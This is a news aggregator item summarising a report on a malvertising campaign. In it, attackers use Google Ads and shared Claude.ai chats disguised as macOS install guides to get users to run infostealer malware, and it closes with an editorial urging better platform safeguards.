BotBeat
...
← Back

> ▌

AnthropicAnthropic
INDUSTRY REPORTAnthropic2026-05-11

Attackers Weaponize Claude.ai Shared Chats to Deliver macOS Malware in Active Campaign

Key Takeaways

  • ▸Legitimate platforms like Claude.ai are being weaponized for malware delivery through shared chat features that appear in search results
  • ▸The malware employs advanced evasion techniques including polymorphic payloads, in-memory execution, and victim profiling before payload delivery
  • ▸The campaign combines Google Ads malvertising with social engineering to achieve credibility, bypassing traditional URL reputation checks
Source:
Hacker Newshttps://www.bleepingcomputer.com/news/security/hackers-abuse-google-ads-claudeai-chats-to-push-mac-malware/↗

Summary

A sophisticated malware campaign is leveraging Google Ads and Claude.ai's shared chat feature to deliver macOS infostealer malware to unsuspecting users. Attackers have created malicious Claude.ai shared chats disguised as official "Claude Code on Mac" installation guides, targeting users searching for Claude downloads. When users follow the instructions in these chats, they unknowingly execute obfuscated shell scripts that download and execute malware on their machines.

The campaign demonstrates advanced evasion techniques, including polymorphic delivery (unique obfuscation on each request) and in-memory execution to avoid leaving obvious traces on disk. Security researchers identified at least two separate campaigns using identical social engineering approaches but distinct attacker infrastructure, indicating this is an active and evolving threat. One variant includes victim profiling that checks for Russian or CIS-region keyboard configurations and skips execution if detected, suggesting operators are being selective about targets.

The malware variants steal sensitive data including browser credentials, cookies, and macOS Keychain contents before exfiltrating them to attacker-controlled servers. This campaign is particularly effective because the legitimate destination URL (claude.ai) provides authenticity—users see a real, verified link in Google search results, making the social engineering attack more credible.

  • Multiple threat actors are running similar campaigns with identical approaches but separate infrastructure, indicating a broader trend in targeted malware distribution

Editorial Opinion

This campaign exposes a critical blind spot in how legitimate platforms protect their shared features from weaponization. Claude.ai's shared chats appear in search results and are inherently trustworthy because they're hosted on authentic Anthropic infrastructure—creating a perfect vector for attackers seeking credibility. Anthropic and similar AI platforms need urgent improvements in content monitoring, access controls, and search visibility policies for shared content to prevent their own platforms from becoming unwitting malware distribution networks.

CybersecurityPrivacy & DataMisinformation & Deepfakes

More from Anthropic

AnthropicAnthropic
OPEN SOURCE

Anthropic Releases Prempti: Open-Source Guardrails for AI Coding Agents

2026-05-12
AnthropicAnthropic
PRODUCT LAUNCH

Anthropic Unleashes Computer Use: Claude 3.5 Sonnet Now Controls Your Desktop

2026-05-12
AnthropicAnthropic
PARTNERSHIP

SpaceX Backs Anthropic with Massive Data Centre Deal Amidst Musk's OpenAI Legal Battle

2026-05-12

Comments

Suggested

AnthropicAnthropic
OPEN SOURCE

Anthropic Releases Prempti: Open-Source Guardrails for AI Coding Agents

2026-05-12
MetaMeta
POLICY & REGULATION

Meta Employees Protest Mouse Tracking Technology at US Offices

2026-05-12
AI Industry ResearchAI Industry Research
RESEARCH

Comprehensive Regulatory Mapping Released for AI Agents Under EU Law

2026-05-12
← Back to news
© 2026 BotBeat
AboutPrivacy PolicyTerms of ServiceContact Us